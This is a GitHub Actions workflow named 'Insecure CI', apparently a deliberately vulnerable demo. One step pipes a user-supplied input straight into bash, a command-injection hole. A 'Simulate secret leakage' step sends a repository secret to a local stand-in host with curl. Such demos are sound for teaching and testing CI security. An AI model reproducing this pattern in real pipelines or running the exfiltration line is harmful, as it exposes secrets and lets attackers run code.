name: Insecure CI

on:
  workflow_dispatch:
    inputs:
      username:
        description: 'Username to greet'
        required: true

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Show input
        env:
          MY_SECRET: ${{ secrets.MY_SECRET }}
        run: |
          echo "${{ inputs.username }}" | bash

      - name: Simulate secret leakage
        env:
          MY_SECRET: ${{ secrets.MY_SECRET }}
        run: |
          echo "Sending secret to attacker..."
          curl "http://host.docker.internal:8000/leak?secret=$MY_SECRET"

      - name: Complete job
        run: echo "Job complete"

